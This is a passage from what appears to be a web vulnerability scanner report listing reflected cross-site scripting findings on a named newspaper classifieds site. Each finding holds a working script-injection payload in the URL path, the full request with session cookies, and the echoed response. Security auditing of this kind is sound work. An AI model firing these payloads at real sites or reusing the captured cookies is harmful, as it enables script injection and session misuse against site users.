Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/rentf549c"-alert(1)-"e2c14dc3ef7/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.159. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a78"><script>alert(1)</script>e961e75065f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rent53a78"><script>alert(1)</script>e961e75065f/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rent53a78"><script>alert(1)</script>e961e75065f/" />
...[SNIP]...

1.160. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0fff"><script>alert(1)</script>12393b8137 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housinga0fff"><script>alert(1)</script>12393b8137/rent/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; otu=cbfed66148755e439126da6455913c97; ots=60bf76744e7ba6b01d483d356eed1708; a=dT1GQjIyRkZFQzRDRjAxNUY3; l=r%3D5; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D; cmTPSet=Y; CoreID6=51956591237812908058225; __qca=P0-309717630-1290805822624; 90184176_clogin=l=1290805822&v=1&e=1290809422731; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housinga0fff"><script>alert(1)</script>12393b8137/rent/apartment/" />
...[SNIP]...

1.161. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1bbe"-alert(1)-"441e6b8ef00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housingb1bbe"-alert(1)-"441e6b8ef00/rent/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; otu=cbfed66148755e439126da6455913c97; ots=60bf76744e7ba6b01d483d356eed1708; a=dT1GQjIyRkZFQzRDRjAxNUY3; l=r%3D5; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D; cmTPSet=Y; CoreID6=51956591237812908058225; __qca=P0-309717630-1290805822624; 90184176_clogin=l=1290805822&v=1&e=1290809422731; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housingb1bbe"-alert(1)-"441e6b8ef00/rent/apartment/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.162. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f319"><script>alert(1)</script>753c6886db6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rent8f319"><script>alert(1)</script>753c6886db6/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; otu=cbfed66148755e439126da6455913c97; ots=60bf76744e7ba6b01d483d356eed1708; a=dT1GQjIyRkZFQzRDRjAxNUY3; l=r%3D5; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D; cmTPSet=Y; CoreID6=51956591237812908058225; __qca=P0-309717630-1290805822624; 90184176_clogin=l=1290805822&v=1&e=1290809422731; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rent8f319"><script>alert(1)</script>753c6886db6/apartment/" />
...[SNIP]...

1.163. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c8f"-alert(1)-"52f037de594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/renta9c8f"-alert(1)-"52f037de594/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; otu=cbfed66148755e439126da6455913c97; ots=60bf76744e7ba6b01d483d356eed1708; a=dT1GQjIyRkZFQzRDRjAxNUY3; l=r%3D5; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D; cmTPSet=Y; CoreID6=51956591237812908058225; __qca=P0-309717630-1290805822624; 90184176_clogin=l=1290805822&v=1&e=1290809422731; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:38 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/renta9c8f"-alert(1)-"52f037de594/apartment/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.164. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/-/-/usa:ny:newyork/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f3cc"-alert(1)-"380ba0e14e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing8f3cc"-alert(1)-"380ba0e14e4/rent/apartment/-/-/usa:ny:newyork/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing8f3cc"-alert(1)-"380ba0e14e4/rent/apartment/-/-/usa:ny:newyork/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.165. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/-/-/usa:ny:newyork/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a24"><script>alert(1)</script>2a2f193d597 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing60a24"><script>alert(1)</script>2a2f193d597/rent/apartment/-/-/usa:ny:newyork/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing60a24"><script>alert(1)</script>2a2f193d597/rent/apartment/-/-/usa:ny:newyork/" />
...[SNIP]...

1.166. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/-/-/usa:ny:newyork/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ad2b"-alert(1)-"6f787bddca5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/rent7ad2b"-alert(1)-"6f787bddca5/apartment/-/-/usa:ny:newyork/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/rent7ad2b"-alert(1)-"6f787bddca5/apartment/-/-/usa:ny:newyork/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

